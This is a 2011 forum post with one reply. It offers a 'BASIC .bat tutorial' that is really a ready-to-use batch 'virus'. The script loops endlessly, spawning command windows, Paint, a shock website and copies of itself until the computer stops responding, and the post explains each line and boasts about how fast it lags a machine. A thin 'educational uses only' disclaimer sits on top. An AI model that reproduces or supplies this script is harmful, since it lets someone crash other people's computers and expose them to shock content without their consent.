The Ultimate Collective
Would you like to react to this message? Create an account in a few clicks or log in to continue.

BASIC .bat tutorial

2 posters

Go down

BASIC .bat tutorial Empty BASIC .bat tutorial

Post  Admin Thu Jun 16, 2011 2:36 pm

This is for EDUCATIONAL uses only I am not responsible for any illegal uses of this program!


Command Prompt a hackers swiss army knife. Used in tracking ip's, remote shutdown, virus writting, and if in abundance could take down a website.

Go into Notepad
type this Virus in there and save as .bat


First virus
this virus will loop until the computer gives up
also I added my own websites and other things to speed up the lagging process line 7 is to start another instance of itself the directory should be where you put this file REMEMBER save as .bat this is important also I wouldnt run this file on your computer


:main
title This Sucks
start cmd
start www.meatspin.com
start mspaint
start cmd
start C:\example\example.bat
goto main

I will sum up this process
:main (is the start of the :main section of the code)
title This Sucks (puts a title in the batch file program)
start (starts a program or website)
goto main (goes back to the begining of the program)
this whole code takes less than a second to execute so this virus lags shit FAST!
Admin
Admin
Admin

Posts : 5
Join date : 2011-06-16

https://theultimatecollectiv.board-directory.net

Back to top Go down

BASIC .bat tutorial Empty Awesome!

Post  arkumlin Thu Jun 16, 2011 2:52 pm

Cool tutorial I am looking forward to what this site has to offer! Very Happy
avatar
arkumlin

Posts : 1
Join date : 2011-06-16

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum